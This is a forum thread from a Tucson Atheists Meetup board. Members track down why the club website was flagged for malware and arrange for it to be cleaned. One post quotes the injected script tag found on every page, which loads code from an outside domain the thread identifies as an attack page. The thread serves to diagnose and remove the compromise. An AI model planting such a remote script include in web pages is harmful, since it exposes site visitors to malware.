Tucson Atheists Message Board › Tucsonatheist.org is flagged for having malware

Tucsonatheist.org is flagged for having malware

A former member
Post #: 4
Thought someone should know so we can get it off the google malware list.

http://safebrowsing.c...­

http://www.google.com...­

-Jordan
A former member
Post #: 349
Hey Jordan: See you made it down from the Phoenix area.

Anyway, regarding malware. There was some ugly stuff that went on this site a few months ago where a member - who shall remain nameless - was posting ugly stuff on many of the Tucson websites. The photo was of a "he", but photos on the WWW mean nothing other than who can post what. Anyway, it spread like wildfire between the groups what crap this person was doing to the groups, including the Atheists. The action was basically taking potshots at each one of the groups on some level and minimizing their relevance. It was not an informed approach to discussion, just "Dumbass potshots". Potshot from a hotshot.

Sooooo........why do I bring that up? Because I don't believe that it is just this site that has been infiltrated by malware. It is the whole social system. I have been having trouble for months logging onto this site. People not receiving my correspondence when mailed from the site, editing problems within the internal email system (sometimes my eyesight or fingers don't press the right keys causing spelling errors - but verbage not changed when I have done so during review prior to submittal.) I was recently deleted from the Premier Dining Site (too wordy of a name to remember correctly) and know the organizer (she is relatively new to the area - came out of Mesa) who is a nice gal. Have emailed her to correct the situation and received no response.

I really enjoy the privilege of being a member of the Meetup social network and entrust my well-being online to the members of its Staff. Since you know of this information, I hope you have informed them of the situation. If you have and they ignored you - ooooooh - good luck to us all. May we not experience random acts of idiocy.

Pretty ugly and infantile. So, that being said, welcome to the group. It is a diverse, but great !!!!! group of people with enough varying activities to allow us to meet each other based upon individual preferences. Remember, in the wise words of Steve Martin: (Atheists) "We have no songs."

Deb
A former member
Post #: 5
I'm not from Phoenix, you might have me confused with someone else. I did a little research and the reason why Tucsonatheist.org was flagged is because there is a link or an image from shoremill.com on the tucsonatheist.org website. If we can figure out where the image or link is located and remove it from the tucsonatheist.org website it will be removed from the malware list.

-Jordan
A former member
Post #: 6
I found it, every page on tucsonatheist.org has the following code embedded in the html source:

<script src=http://shoremill.com/_private/blank.­php ></script><body>

This code needs to be removed from the tucsonatheist.org pages and google will remove it from their threat list.

I'm showing that Donald Lacey owns the website, either he or whomever he has maintaining the website will need to do this.

-Jordan
A former member
Post #: 350
Looked up shoremill.com just now and it identifies as an attack page. So does that mean you have direct access into the administrative sites of Meetup.com in order to review and clear this malware?
A former member
Post #: 7
Meetup.com doesn't have anything to do with this issue, the webmaster of tucsonatheist.org can fix it.

-Jordan
A former member
Post #: 351
Hmmmmmm
Don L.
AZAtheist
Group Organizer
Tucson, AZ
Post #: 208
We're working the issue. Andrew is aware of the problem and has contacted the ISP we are using for www.tucsonatheist.org.

Thank you, Jordan for discovering the issue and finding the problem. Andrew will be looking at fixing it and has estimated that it will take a day.

Deb, you are confusing this site (meetup.com) with the club's webpage. They are different and separate.

So far, meetup.com has been very useful and I rely on its features to maintain a mailing list and getting the word out. It is part of the reason the membership of the group has grown to over 300 members. Another feature of meetup.com is this very forum where members can post comments to the group. Our web page is a one way affair. At least here, you can talk back and post other points of view.
A former member
Post #: 353
Hi Don:

You're right - I am confusing something. You posted the following:

Deb, you are confusing this site (meetup.com) with the club's webpage. They are different and separate.

So is the club a Tucson Chapter of AA and are the monthly meetings a simultaneous meeting for the AA and Tucson Meetup?

In the past you have mentioned three meetups that you host, ours, the Sceptics and one other, but was unaware that there was an organization outside the meetup group where there was overlap. No problem, just unaware.

Thanks and thanks Jordan for rooting out the cause of malware.

Deb
A former member
Post #: 357
MALWARE ATTACK THWARTED

Upon launching my computer yesterday, the screen went to the darkness of "evil" and the most ominous attack graphic I have ever received was posted across my little flat screen. A malware attack on my system had been targeted by my security software and then I was given a second post - that if I clicked a certain button it would "mutilate and destroy" it (those are my words). It appeared to be from my security software so I went to that "trusting place" of a 50-50 chance of it being real and clicked away.

So, since I visit this site and this has been a running discussion, just thought I would let you know that an attack occurred on my system and there is a 50-50 chance I am not harboring that malware.

Thanks - Deb